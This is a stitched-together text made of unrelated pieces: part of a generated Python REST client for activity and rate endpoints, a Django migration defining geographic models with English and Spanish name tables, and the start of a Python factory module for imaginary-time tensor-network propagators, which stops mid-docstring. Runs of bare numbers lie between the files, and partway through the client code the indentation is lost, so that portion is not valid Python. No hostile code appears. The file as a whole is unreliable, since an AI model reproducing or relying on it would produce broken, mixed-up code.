        response_type='ActivityEntity',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def api_activities_id_meta_patch(self, id, **kwargs):  # noqa: E501
    """Sets the value of a meta-field for an existing activity  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_id_meta_patch(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: Activity record ID to set the meta-field value for (required)
    :param Body body:
    :return: ActivityEntity, or the request thread when async.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.api_activities_id_meta_patch_with_http_info(id, **kwargs)  # noqa: E501
    return self.api_activities_id_meta_patch_with_http_info(id, **kwargs)  # noqa: E501
def api_activities_id_meta_patch_with_http_info(self, id, **kwargs):  # noqa: E501
    """Sets the value of a meta-field for an existing activity  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_id_meta_patch_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: Activity record ID to set the meta-field value for (required)
    :param Body body:
    :return: ActivityEntity, or the request thread when async.
    """
    all_params = ['id', 'body', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_activities_id_meta_patch" % key
            )
        params[key] = val
    del params['kwargs']

    # reject a missing required 'id'
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `api_activities_id_meta_patch`")  # noqa: E501

    path_params = {'id': params['id']}

    # Authentication setting
    auth_settings = ['apiToken', 'apiUser']  # noqa: E501

    return self.api_client.call_api(
        '/api/activities/{id}/meta', 'PATCH',
        path_params,
        [],  # query params
        {},  # header params
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='ActivityEntity',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def api_activities_id_patch(self, body, id, **kwargs):  # noqa: E501
    """Update an existing activity  # noqa: E501

    Update an existing activity, you can pass all or just a subset of all attributes  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_id_patch(body, id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ActivityEditForm body: (required)
    :param int id: Activity ID to update (required)
    :return: ActivityEntity, or the request thread when async.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.api_activities_id_patch_with_http_info(body, id, **kwargs)  # noqa: E501
    return self.api_activities_id_patch_with_http_info(body, id, **kwargs)  # noqa: E501
def api_activities_id_patch_with_http_info(self, body, id, **kwargs):  # noqa: E501
    """Update an existing activity  # noqa: E501

    Update an existing activity, you can pass all or just a subset of all attributes  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_id_patch_with_http_info(body, id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ActivityEditForm body: (required)
    :param int id: Activity ID to update (required)
    :return: ActivityEntity, or the request thread when async.
    """
    all_params = ['body', 'id', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_activities_id_patch" % key
            )
        params[key] = val
    del params['kwargs']

    # reject missing required parameters (same order as the generator: body, id)
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `api_activities_id_patch`")  # noqa: E501
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `api_activities_id_patch`")  # noqa: E501

    path_params = {'id': params['id']}

    # Authentication setting
    auth_settings = ['apiToken', 'apiUser']  # noqa: E501

    return self.api_client.call_api(
        '/api/activities/{id}', 'PATCH',
        path_params,
        [],  # query params
        {},  # header params
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='ActivityEntity',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def api_activities_id_rates_get(self, id, **kwargs):  # noqa: E501
    """Returns a collection of all rates for one activity  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_id_rates_get(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: The activity whose rates will be returned (required)
    :return: list[ActivityRate], or the request thread when async.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.api_activities_id_rates_get_with_http_info(id, **kwargs)  # noqa: E501
    return self.api_activities_id_rates_get_with_http_info(id, **kwargs)  # noqa: E501
def api_activities_id_rates_get_with_http_info(self, id, **kwargs):  # noqa: E501
    """Returns a collection of all rates for one activity  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_id_rates_get_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: The activity whose rates will be returned (required)
    :return: list[ActivityRate], or the request thread when async.
    """
    all_params = ['id', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_activities_id_rates_get" % key
            )
        params[key] = val
    del params['kwargs']

    # reject a missing required 'id'
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `api_activities_id_rates_get`")  # noqa: E501

    path_params = {'id': params['id']}

    # Authentication setting
    auth_settings = ['apiToken', 'apiUser']  # noqa: E501

    return self.api_client.call_api(
        '/api/activities/{id}/rates', 'GET',
        path_params,
        [],  # query params
        {},  # header params
        body=None,
        post_params=[],
        files={},
        response_type='list[ActivityRate]',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def api_activities_id_rates_post(self, id, body, **kwargs):  # noqa: E501
    """Adds a new rate to an activity  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_id_rates_post(id, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: The activity to add the rate for (required)
    :param ActivityRateForm body: (required)
    :return: ActivityRate, or the request thread when async.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.api_activities_id_rates_post_with_http_info(id, body, **kwargs)  # noqa: E501
    return self.api_activities_id_rates_post_with_http_info(id, body, **kwargs)  # noqa: E501
def api_activities_id_rates_post_with_http_info(self, id, body, **kwargs):  # noqa: E501
    """Adds a new rate to an activity  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_id_rates_post_with_http_info(id, body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: The activity to add the rate for (required)
    :param ActivityRateForm body: (required)
    :return: ActivityRate, or the request thread when async.
    """
    all_params = ['id', 'body', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501

    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method api_activities_id_rates_post" % key
            )
        params[key] = val
    del params['kwargs']

    # reject missing required parameters (same order as the generator: id, body)
    if params.get('id') is None:
        raise ValueError("Missing the required parameter `id` when calling `api_activities_id_rates_post`")  # noqa: E501
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `api_activities_id_rates_post`")  # noqa: E501

    path_params = {'id': params['id']}

    # Authentication setting
    auth_settings = ['apiToken', 'apiUser']  # noqa: E501

    return self.api_client.call_api(
        '/api/activities/{id}/rates', 'POST',
        path_params,
        [],  # query params
        {},  # header params
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='ActivityRate',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def api_activities_id_rates_rate_id_delete(self, id, rate_id, **kwargs):  # noqa: E501
    """Deletes one rate for an activity  # noqa: E501

    Synchronous by default; pass async_req=True to receive the request
    thread instead and call .get() on it for the result.
    >>> thread = api.api_activities_id_rates_rate_id_delete(id, rate_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int id: The activity whose rate will be removed (required)
    :param int rate_id: The rate to remove (required)
    :return: None, or the request thread when async.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.api_activities_id_rates_rate_id_delete_with_http_info(id, rate_id, **kwargs)  # noqa: E501
    return self.api_activities_id_rates_rate_id_delete_with_http_info(id, rate_id, **kwargs)  # noqa: E501
def api_activities_id_rates_rate_id_delete_with_http_info(self, id, rate_id, **kwargs): # noqa: E501
"""Deletes one rate for an activity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_id_rates_rate_id_delete_with_http_info(id, rate_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The activity whose rate will be removed (required)
:param int rate_id: The rate to remove (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'rate_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_activities_id_rates_rate_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `api_activities_id_rates_rate_id_delete`") # noqa: E501
# verify the required parameter 'rate_id' is set
if ('rate_id' not in params or
params['rate_id'] is None):
raise ValueError("Missing the required parameter `rate_id` when calling `api_activities_id_rates_rate_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
if 'rate_id' in params:
path_params['rateId'] = params['rate_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/activities/{id}/rates/{rateId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def api_activities_post(self, body, **kwargs): # noqa: E501
"""Creates a new activity # noqa: E501
Creates a new activity and returns it afterwards # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_post(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ActivityEditForm body: (required)
:return: ActivityEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.api_activities_post_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.api_activities_post_with_http_info(body, **kwargs) # noqa: E501
return data
def api_activities_post_with_http_info(self, body, **kwargs): # noqa: E501
"""Creates a new activity # noqa: E501
Creates a new activity and returns it afterwards # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.api_activities_post_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ActivityEditForm body: (required)
:return: ActivityEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method api_activities_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `api_activities_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['apiToken', 'apiUser'] # noqa: E501
return self.api_client.call_api(
'/api/activities', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ActivityEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.035496
| 314
| 0.614245
| 4,153
| 34,343
| 4.849506
| 0.060197
| 0.046077
| 0.042453
| 0.0286
| 0.946375
| 0.933615
| 0.921053
| 0.906653
| 0.886544
| 0.867229
| 0
| 0.015341
| 0.293946
| 34,343
| 816
| 315
| 42.08701
| 0.815242
| 0.335265
| 0
| 0.740577
| 0
| 0.008869
| 0.216799
| 0.060188
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037694
| false
| 0
| 0.008869
| 0
| 0.101996
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ecea1dee90d39f5a9e50539aad613fcc30bd0c6
| 12,934
|
py
|
Python
|
codenerix_geodata/migrations/0001_initial.py
|
centrologic/django-codenerix-geodata
|
42d8cca77857765db4ead311608dfee55711ff51
|
[
"Apache-2.0"
] | 1
|
2017-11-23T13:28:19.000Z
|
2017-11-23T13:28:19.000Z
|
codenerix_geodata/migrations/0001_initial.py
|
centrologic/django-codenerix-geodata
|
42d8cca77857765db4ead311608dfee55711ff51
|
[
"Apache-2.0"
] | null | null | null |
codenerix_geodata/migrations/0001_initial.py
|
centrologic/django-codenerix-geodata
|
42d8cca77857765db4ead311608dfee55711ff51
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-09-18 08:08
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the codenerix_geodata app.

    Creates the geographic hierarchy (Continent > Country > Region >
    Province > City, plus TimeZone) and, for each geographic entity, two
    translation tables (``...GeoNameEN`` / ``...GeoNameES``) that attach an
    English/Spanish name via a OneToOneField with ``related_name`` 'en'/'es'.
    All core models expose the extended default_permissions set including
    the custom 'list' permission.
    """

    # First migration of the app: nothing to depend on.
    initial = True

    dependencies = [
    ]

    operations = [
        # --- Core geographic entities -----------------------------------
        migrations.CreateModel(
            name='City',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
            ],
            options={
                'abstract': False,
                'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
            },
        ),
        # --- Per-language name tables (one row per entity, 'en'/'es') ---
        migrations.CreateModel(
            name='CityGeoNameEN',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('name', models.CharField(max_length=100, verbose_name='Name')),
                ('city', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_geodata.City')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='CityGeoNameES',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('name', models.CharField(max_length=100, verbose_name='Name')),
                ('city', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_geodata.City')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Continent',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                # Two-letter continent code, unique across the table.
                ('code', models.CharField(max_length=2, unique=True, verbose_name='Code')),
            ],
            options={
                'abstract': False,
                'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
            },
        ),
        migrations.CreateModel(
            name='ContinentGeoNameEN',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('name', models.CharField(max_length=100, verbose_name='Name')),
                ('continent', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_geodata.Continent')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='ContinentGeoNameES',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('name', models.CharField(max_length=100, verbose_name='Name')),
                ('continent', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_geodata.Continent')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Country',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                # Two-letter country code (presumably ISO 3166-1 alpha-2 — confirm against data loader).
                ('code', models.CharField(max_length=2, unique=True, verbose_name='Code')),
                ('continent', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='countries', to='codenerix_geodata.Continent', verbose_name='Continent')),
            ],
            options={
                'abstract': False,
                'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
            },
        ),
        migrations.CreateModel(
            name='CountryGeoNameEN',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('name', models.CharField(max_length=100, verbose_name='Name')),
                ('country', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_geodata.Country')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='CountryGeoNameES',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('name', models.CharField(max_length=100, verbose_name='Name')),
                ('country', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_geodata.Country')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Province',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                # Not unique: province codes may repeat across regions.
                ('code', models.CharField(max_length=3, verbose_name='Code')),
            ],
            options={
                'abstract': False,
                'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
            },
        ),
        migrations.CreateModel(
            name='ProvinceGeoNameEN',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('name', models.CharField(max_length=100, verbose_name='Name')),
                ('province', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_geodata.Province')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='ProvinceGeoNameES',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('name', models.CharField(max_length=100, verbose_name='Name')),
                ('province', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_geodata.Province')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='Region',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('code', models.CharField(max_length=3, verbose_name='Code')),
                ('country', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='regions', to='codenerix_geodata.Country', verbose_name='Country')),
            ],
            options={
                'abstract': False,
                'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
            },
        ),
        migrations.CreateModel(
            name='RegionGeoNameEN',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('name', models.CharField(max_length=100, verbose_name='Name')),
                ('region', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='en', to='codenerix_geodata.Region')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='RegionGeoNameES',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('name', models.CharField(max_length=100, verbose_name='Name')),
                ('region', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='es', to='codenerix_geodata.Region')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='TimeZone',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Created')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Updated')),
                ('name', models.CharField(max_length=50, unique=True, verbose_name='Name')),
            ],
            options={
                'abstract': False,
                'default_permissions': ('add', 'change', 'delete', 'view', 'list'),
            },
        ),
        # --- Cross-links added after all models exist (avoids forward refs) ---
        migrations.AddField(
            model_name='province',
            name='region',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='provinces', to='codenerix_geodata.Region', verbose_name='Region'),
        ),
        migrations.AddField(
            model_name='city',
            name='country',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cities', to='codenerix_geodata.Country', verbose_name='Country'),
        ),
        migrations.AddField(
            model_name='city',
            name='province',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='cities', to='codenerix_geodata.Province', verbose_name='Province'),
        ),
        migrations.AddField(
            model_name='city',
            name='region',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='cities', to='codenerix_geodata.Region', verbose_name='Region'),
        ),
        # NOTE(review): verbose_name='City' on the time_zone FK looks like a
        # copy-paste slip (expected something like 'Time zone'). Do not edit an
        # applied migration; if it matters, fix it on the model with a new migration.
        migrations.AddField(
            model_name='city',
            name='time_zone',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cities', to='codenerix_geodata.TimeZone', verbose_name='City'),
        ),
    ]
| 51.325397
| 180
| 0.576852
| 1,228
| 12,934
| 5.885993
| 0.07899
| 0.10653
| 0.072634
| 0.115108
| 0.911179
| 0.908965
| 0.899281
| 0.889873
| 0.889873
| 0.889873
| 0
| 0.00567
| 0.277331
| 12,934
| 251
| 181
| 51.52988
| 0.767626
| 0.005257
| 0
| 0.740741
| 1
| 0
| 0.147477
| 0.033041
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012346
| 0
| 0.028807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7eeecc6f441ac8c99db932f925c174ddca5ff26e
| 7,451
|
py
|
Python
|
tmps/chain/itime/factory.py
|
fhoeb/py-tmps
|
b7eced582acb4042815a775090a59f569975e3be
|
[
"BSD-3-Clause"
] | 1
|
2020-02-21T20:03:44.000Z
|
2020-02-21T20:03:44.000Z
|
tmps/chain/itime/factory.py
|
fhoeb/py-tmps
|
b7eced582acb4042815a775090a59f569975e3be
|
[
"BSD-3-Clause"
] | null | null | null |
tmps/chain/itime/factory.py
|
fhoeb/py-tmps
|
b7eced582acb4042815a775090a59f569975e3be
|
[
"BSD-3-Clause"
] | 1
|
2020-02-21T19:56:53.000Z
|
2020-02-21T19:56:53.000Z
|
"""
Main interface factory functions for imaginary time evolution propagators (ITMPS, ITMPO, ITPMPS)
"""
from tmps.chain.itime.itmps import ITMPS
from tmps.chain.itime.itpmps import ITPMPS
from tmps.chain.itime.itmpo import ITMPO
import numpy as np
from tmps.utils.shape import check_shape
def from_hamiltonian(psi_0, mpa_type, h_site, h_bond, tau=0.01, state_compression_kwargs=None,
                     op_compression_kwargs=None, second_order_trotter=False, t0=0, psi_0_compression_kwargs=None,
                     track_trace=False):
    """
    Factory function for imaginary time TMP-objects (ITMPS, ITMPO, ITPMPS)
    :param psi_0: Initial state as MPArray. Need not be normalized, as it is normalized before propagation
    :param mpa_type: Type of MPArray to propagate, supported are mps, mpo, and pmps
    :param h_site: Iterator over local site Hamiltonians. If a single numpy ndarray is passed
                   this element is broadcast over all sites
    :param h_bond: Iterator over bond Hamiltonians. If a single numpy ndarray is passed
                   this element is broadcast over all bonds
    :param tau: Timestep for each invocation of evolve. Real timestep should be passed here. Default is .01
    :param state_compression_kwargs: Arguments for mpa compression after each dot product (see real time
                                     evolution factory function for details)
    :param op_compression_kwargs: Arguments for trotter step operator pre-compression (see real time evolution
                                  factory function for details)
    :param second_order_trotter: Switch to use second order instead of fourth order trotter if desired
                                 By default fourth order Trotter is used
    :param t0: Initial time of the propagation
    :param psi_0_compression_kwargs: Optional compresion kwargs for the initial state (see real time evolution
                                     factory function for details)
    :param track_trace: If the trace of the (effective) density matrix should be tracked during the
                        imaginary time evolution
    :return: TMP object. If mpa_type is mps: ITMPS obj., if mpa_type is mpo: ITMPO obj.,
             if mpa_type is pmps: ITPMPS obj.
    :raises AssertionError: If the state shape does not match mpa_type, if tau is not a nonzero
                            real number, or if mpa_type is unrecognized.
    """
    if not check_shape(psi_0, mpa_type):
        raise AssertionError('MPA shape of the initial state is not compatible with the chosen mpa_type')
    # Explicit check instead of a bare `assert`: input validation must survive `python -O`.
    # Same exception type (AssertionError) as before, so callers are unaffected.
    if not (np.imag(tau) == 0 and np.real(tau) != 0):
        raise AssertionError('tau must be a nonzero real number')
    # Wick rotation: the propagators receive the imaginary timestep 1j*tau.
    tau = 1j * tau
    # One propagator class per mpa_type. The two booleans are the positional
    # flags the original branches passed (presumably ancilla/operator switches
    # of the TMP base class — confirm against the propagator implementations).
    factories = {'mps': (ITMPS, False, False),
                 'pmps': (ITPMPS, True, False),
                 'mpo': (ITMPO, False, True)}
    if mpa_type not in factories:
        raise AssertionError('Unrecognized mpa_type')
    propagator, flag_a, flag_b = factories[mpa_type]
    return propagator.from_hamiltonian(psi_0, flag_a, flag_b, h_site, h_bond, tau=tau,
                                       state_compression_kwargs=state_compression_kwargs,
                                       op_compression_kwargs=op_compression_kwargs,
                                       second_order_trotter=second_order_trotter, t0=t0,
                                       psi_0_compression_kwargs=psi_0_compression_kwargs,
                                       track_trace=track_trace)
def from_hi(psi_0, mpa_type, hi, tau=0.01, state_compression_kwargs=None,
            op_compression_kwargs=None, second_order_trotter=False, t0=0, psi_0_compression_kwargs=None,
            track_trace=False):
    """
    Factory function for imaginary time TMP-objects (ITMPS, ITMPO, ITPMPS)
    :param psi_0: Initial state as MPArray. Need not be normalized, as it is normalized before propagation
    :param mpa_type: Type of MPArray to propagate, supported are mps, mpo, and pmps
    :param hi: List/Tuple of all terms in the Hamiltonian H = sum_i hi, where hi is local to one bond
